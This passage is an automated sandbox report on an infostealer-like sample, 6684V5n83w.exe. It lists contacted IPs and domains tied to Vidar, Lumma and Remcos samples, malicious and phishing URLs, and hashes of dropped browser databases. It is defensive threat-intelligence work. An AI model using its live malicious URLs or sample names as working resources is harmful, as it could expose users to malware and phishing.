                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, www.gstatic.com, prod-agic-ne-9.northeurope.cloudapp.azure.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, prod-agic-we-8.westeurope.cloudapp.azure.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, confi
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                              • VT rate limit hit for: 6684V5n83w.exe
                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                              03:45:12API Interceptor1x Sleep call for process: 6684V5n83w.exe modified
                                                                                                                                                                                                                                              03:45:16API Interceptor16x Sleep call for process: Evans.com modified
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              162.159.61.3BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                sysmonconfig.xmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                        aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  108.139.47.92JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousPureCrypter, Amadey, Cerbfyne Stealer, Credential Flusher, Cryptbot, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                  JHPvqMzKbz.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    https://praviplastics.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9YW01cVRWST0mdWlkPVVTRVIxMjA5MjAyNFU0ODA5MTI1OQ==#j.pullen@newheycarpets.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      23.44.201.17file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                          https://nimblethumb.world/ad88e0364e2c172b62811cb705409770Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                            20.110.205.119BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                              Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                  aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                    installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                      din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                          HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                            PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                              ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                t.meBHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                https://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                yoda.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                chrome.cloudflare-dns.comBHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                                sysmonconfig.xmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                                Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                                FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                                JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                                T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                                aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                                skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                                                din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                                sdoout.lolBHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 116.203.14.4
                                                                                                                                                                                                                                                                                                                ssl.bingadsedgeextension-prod-europe.azurewebsites.netBHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                                                                                Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                                                                                JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                                                                                aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                                                                                skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                                                                                din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                                                                                HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                                                                                PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                AMAZON-02USPO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                                                                                • 18.141.10.107
                                                                                                                                                                                                                                                                                                                25F.tmp.exeGet hashmaliciousDarkbotBrowse
                                                                                                                                                                                                                                                                                                                • 18.244.18.38
                                                                                                                                                                                                                                                                                                                chernobyl.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                                                                                                                DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                                                                                                                                                                                                                • 34.241.139.243
                                                                                                                                                                                                                                                                                                                ARMV7L.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                • 54.247.62.1
                                                                                                                                                                                                                                                                                                                systempreter.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                                                                                                • 3.69.157.220
                                                                                                                                                                                                                                                                                                                http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 13.32.99.103
                                                                                                                                                                                                                                                                                                                rjnven64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                                                                                                                https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                                                                • 18.245.31.129
                                                                                                                                                                                                                                                                                                                Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 185.166.143.48
                                                                                                                                                                                                                                                                                                                CLOUDFLARENETUSx6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                • 104.21.112.1
                                                                                                                                                                                                                                                                                                                heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                                                                                • 172.67.136.42
                                                                                                                                                                                                                                                                                                                re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                                                                                zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                                                                                hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                                                                                PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                                                                                DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                                                                                                                                                                                                                • 104.17.247.203
                                                                                                                                                                                                                                                                                                                Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                                                                                                                                https://nutricarm.es/wp-templates/f8b83.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 104.21.96.1
                                                                                                                                                                                                                                                                                                                AKAMAI-ASN1EUhttp://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 95.101.148.20
                                                                                                                                                                                                                                                                                                                kwari.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 172.237.42.205
                                                                                                                                                                                                                                                                                                                BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 23.44.203.178
                                                                                                                                                                                                                                                                                                                botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                • 172.238.68.235
                                                                                                                                                                                                                                                                                                                sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                                                                                • 184.84.115.37
                                                                                                                                                                                                                                                                                                                Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 23.219.82.59
                                                                                                                                                                                                                                                                                                                gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                                                                iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                                                                oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eheteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                                                                                • 40.115.3.253
                                                                                                                                                                                                                                                                                                                re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                • 40.115.3.253
                                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                • 40.115.3.253
                                                                                                                                                                                                                                                                                                                Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                • 40.115.3.253
                                                                                                                                                                                                                                                                                                                Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                                                                                                                • 40.115.3.253
                                                                                                                                                                                                                                                                                                                Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 40.115.3.253
                                                                                                                                                                                                                                                                                                                XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                                                                                • 40.115.3.253
                                                                                                                                                                                                                                                                                                                hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                                • 40.115.3.253
                                                                                                                                                                                                                                                                                                                web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                • 40.115.3.253
                                                                                                                                                                                                                                                                                                                random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                • 40.115.3.253
                                                                                                                                                                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                                                                                • 116.203.14.4
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 116.203.14.4
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 116.203.14.4
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                Loader.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                                                                                                                                                                                                • 116.203.14.4
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                • 116.203.14.4
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                • 116.203.14.4
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                                                • 116.203.14.4
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                                                • 116.203.14.4
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                                                • 116.203.14.4
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                                                • 116.203.14.4
                                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comvlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                  AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                    0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                      installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                        @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                          !Set-up..exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                            !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                              SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                  j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2649904685014508
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:8/2qOB1nxCkMbSAELyKOMq+8yC8F/YfU5m+OlTLVumc:Bq+n0Jb9ELyKOMq+8y9/Owb
                                                                                                                                                                                                                                                                                                                                    MD5:17044C1AD07ECE7095D4C78C00DD0DD6
                                                                                                                                                                                                                                                                                                                                    SHA1:3047F1B9A76AB980BC89B6F392B48721469FC89F
                                                                                                                                                                                                                                                                                                                                    SHA-256:D9868D43378FD125A4C70C558F0B949624859676D196C7E3FC3080F70E2B0292
                                                                                                                                                                                                                                                                                                                                    SHA-512:73A24129A90D3B0CBC68AD39235ECB6BAA4287877FDE514A2C03B69B53DB2AA76B8D4DBCCFCA7398932A1033A8B4ED9FF51A98E18F84D3453C7500E106470E37
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):9504
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                                                                    MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                                                                    SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                                                                    SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                                                                    SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):155648
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                                                    MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                                                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                                                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                                                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                    Category:dropped
